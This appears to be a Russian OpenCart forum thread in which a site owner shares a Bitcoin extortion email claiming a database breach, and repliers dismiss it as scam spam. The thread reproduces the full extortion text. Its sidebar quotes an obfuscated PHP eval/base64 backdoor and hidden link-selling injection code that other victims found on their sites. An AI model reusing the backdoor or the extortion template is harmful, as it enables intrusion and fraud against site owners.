Jump to content

Recommended Posts

На почту пришло такое письмо. Как защитить сайт?

Мы взломали ваш сайт http://www.brandoptics.com.ua и извлекли ваши базы данных.

Как это случилось?
Наша команда обнаружила уязвимость на вашем сайте, которую мы смогли использовать. После обнаружения уязвимости мы смогли получить учетные данные вашей базы данных, извлечь всю базу данных и перенести информацию на оффшорный сервер.

Что это значит?

Мы будем систематически проходить через ряд шагов, наносящих полный ущерб вашей репутации. Сначала ваша база данных будет пропущена или продана самой высокой цене, которую они будут использовать с какими бы намерениями они ни были. Затем, если будут найдены электронные письма, они будут отправлены по электронной почте, что их информация была продана или утечка, и ваш сайт http://www.brandoptics.com.ua был виноват, таким образом, нанося ущерб вашей репутации и вызывая злых клиентов / партнеров с что бы ни делали злые клиенты / партнеры. Наконец, любые ссылки, которые вы проиндексировали в поисковых системах, будут деиндексироваться на основе техник блэкхата, которые мы использовали в прошлом для индексации наших целей.

Как мне это остановить?

Мы готовы воздержаться от разрушения репутации вашего сайта за небольшую плату. Текущая плата составляет 2000 долларов США в биткойнах (BTC).

Отправьте биткойн по следующему адресу биткойна (скопируйте и вставьте, так как он чувствителен к регистру):

1Md6imvB2neTF3s1kFiMG473k1XrBhxQhF

Как только вы заплатите, мы автоматически получим уведомление о том, что это был ваш платеж. Обратите внимание, что вы должны произвести оплату в течение 5 дней после получения этого уведомления или утечки из базы данных, отправки электронных писем и начала индексации вашего сайта!

Как я могу получить биткойны?

Вы можете легко купить биткойны через несколько веб-сайтов или даже в автономном режиме через биткойн-банкомат. Мы предлагаем вам https://cex.io/ для покупки биткойнов.

Что если я не буду платить?

Если вы решите не платить, мы начнем атаку в указанную дату и будем поддерживать ее до тех пор, пока вы этого не сделаете. Никаких мер противодействия этому нет, вы в конечном итоге потратите больше денег, пытаясь найти решение. Мы полностью уничтожим вашу репутацию среди Google и ваших клиентов.

Это не обман, не отвечайте на это письмо, не пытайтесь рассуждать или вести переговоры, мы не будем читать никаких ответов. Как только вы заплатите, мы прекратим то, что мы делали, и вы больше никогда не услышите от нас!

Обратите внимание, что Биткойн является анонимным, и никто не узнает, что вы выполнили его.
 телефон: Германия

Share this post


Link to post
Share on other sites

да похоже просто на бред, я бы проигнорировал.

Share this post


Link to post
Share on other sites

14 летний школьник купил базы имейлов и рассылает такой мошеннический спам. В сентябре таких "взломов" станет меньше. Я бы на Вашем месте репортнул его почту, пусть новую регает, жизнь мошенника не должна быть легкой)

Share this post


Link to post
Share on other sites

попросите скриншот таблицы покупателей

так хотя бы узнаете правда ли была утечка

 

Share this post


Link to post
Share on other sites

5 мая произошла аналогичная ситуация, даже адрес биткоина тот же:

1Md6imvB2neTF3s1kFiMG473k1XrBhxQhF

Рассылка идёт из формы обратной связи сайта. Как ни странно, установленный модуль "Антиспам формы обратной связи" не сработал - пропустил сообщение в почтовый ящик. Тех. поддержка хостинга не выявила ничего вредоносного. Классифицировано как спам рассылка. Идёт с IP 195.117.107.182 (Польша).

Share this post


Link to post
Share on other sites

"Как только вы заплатите, мы автоматически получим уведомление о том, что это был ваш платеж."

"Обратите внимание, что Биткойн является анонимным, и никто не узнает, что вы выполнили его."

 

:grin: :-D :-D

 

Похоже на развод десятилетней давности : " У нас есть Ваши порнушные фото:evil:, - Платите или весь мир их увидит :shock:

Но на вопрос предоставить доказательство сразу есть ответ : "Это не обман, не отвечайте на это письмо, не пытайтесь рассуждать или вести переговоры, мы не будем читать никаких ответов. Как только вы заплатите, мы прекратим то, что мы делали, и вы больше никогда не услышите от нас!"

 

Забейте! Лучше уж вступить в наследство в Африке (видли наверное такие письма), там хоть попереписываться с юморком можно.

 

Share this post


Link to post
Share on other sites
46 минут назад, neomax сказал:

Лучше уж вступить в наследство в Африке

я был наследником в штатах

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Similar Content

    • By RGB
      Не так давно скинули мне ссылку на страницу интеграций Яндекс Метрики под любую задачу, самое интересное находится в разделе CMS в блоке нашего любимого OpenCart - Электронная коммерация: https://metrika.yandex.ru/about/info/integrations 

       
      Можете представить безудержный смех и радость мошенников, получивших с яндекса такую жирную ссылочку на свой уютный пиратский ресурс и покупателей, которые наверняка по этой ссылке уже не раз проспонсировали пиратов?  
       
      P.S. Насколько я знаю, в Яндекс было обращение, причем прошло уже немало времени и ситуация была разжевана как для полных идиотов с перечислением легальных и пиратских площадок, указанием их отличий, примерами и прочей никому не интересной информацией. Реакции, как видите, никакой не последовало, поэтому - неуважаемый Яндекс, фу такими быть!
      P.P.S. На случай, если произойдет невозможное событие и эту тему увидит кто-нибудь из Яндекса - зайдите, пожалуйста, сюда, и прочтите все это внимательно:
       
      Кому лень переходить по ссылке - немного поясню по шагам, как работают такие сайты, как тот, на который в Яндексе додумались поставить ссылку.
      1. Берется какой-нибудь популярный модуль с официальной площадки или с нашего OpenCartForum, к примеру вот - известный модуль упрощенного оформления заказа AJAX Quick Checkout PRO (One Page Checkout, Fast Checkout) https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=9132
      2. Его взламывают (или находят на какой-то соседней варезной помойке старую версию), переименовывают так, чтобы название отражало суть, но не полностью совпадало с оригиналом - например, AJAX Quick Checkout PRO превратился в Custom Quick Checkout для Opencart.
      3. Делаются скриншоты модуля, но так, чтобы по ним не сразу было понятно, что это за модуль в оригинале (никакого демо, естетственно, пираты не поднимают для демонстрации работы модуля), например - это старая версия вышеупомянутого AJAX Quick Checkout от студии Dreamvention:

       
      А это - скриншот супер-пупер модуля "Custom Quick Checkout для Opencart" от пиратов (как говорится, найди 10 отличий - даже иконки для заголовков блоков не потрудились поменять):

      4. В итоге модуль выкладывается пиратами с ценой поскромнее оригинала, чтобы потенциальные любители халявы не сильно пугались - на сейчас оригинал стоит 56$, а пиратская подделка всего лишь 500 рублей. 
       
    • By Anton999
      Приветствую!
       
      Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.
       
      Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.
       
      Всем спасибо!
    • By proseotut
      Добрый день
      кто-то уже сталкивался с тем, что с сайта начинают торговать ссылками в невидимом блоке - добавили код в шаблон сайта, который размещает на страницах ссылки sape и linkfeed?
      появляются папки с id юзеров в папке: /catalog/view/image
      а коды размещения модуля на странице в контроллех прописаны и в шаблоне сайта
      пример такого кода в footer.php
      global $linkfeed; define('LINKFEED_USER', 'тут код одного юзера'); require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'.LINKFEED_USER.'/linkfeed.php'); $linkfeed = new LinkfeedClient(); global $sape; if (!defined('_SAPE_USER')){define('_SAPE_USER', 'тут код другого юзера');} require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'._SAPE_USER.'/sape.php'); $o = array(); $o['charset'] = 'UTF-8'; //ваша кодировка $o['force_show_code'] = false; //показать проверочный код $sape = new SAPE_client($o); ?> пример вывода в шаблоне, к сожалению, не сохранился(
      удалили, заменили доступы, прошло пару недель и он снова на сайте. 
      Если вы справились, подскажите решение, как исправить?
    • By ToBeRich
      Добрый день Уважаемые Форумчане!
      В общем, с OpenCart'ом работаю я совсем недавно. В рунете и не только огромное количество различных сайтов предлагающих модули, шаблоны и различные услуги для OpenCart.
      Но на первых парах естественно очень сложно определить кто продает модули и темы от разработчика, а кто банально толкает чужие разработки. Так же и с услугами, разграничение прав, это несомненно хорошо, однако уверен, неприятно пускать мошенников на свой сайт. Варезы думаю не стоит сюда добавлять, с ними и так все ясно. Но вот продавать чужие модули и шаблоны - это уже верх наглости. А именно таких сайтов сейчас развелось целое море! 
      Давайте составим список, мошенников должны знать в лицо!
      Думаю правильнее будет добавлять описание, почему именно этот сайт Вы считаете нарушителем авторских прав. Ну и наверное адрес сайта в виде скриншота.
      Прошу администрацию помочь правильно оформить и/или переместить эту тему, если Вы посчитаете ее полезной.
    • By ArtemPitov
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.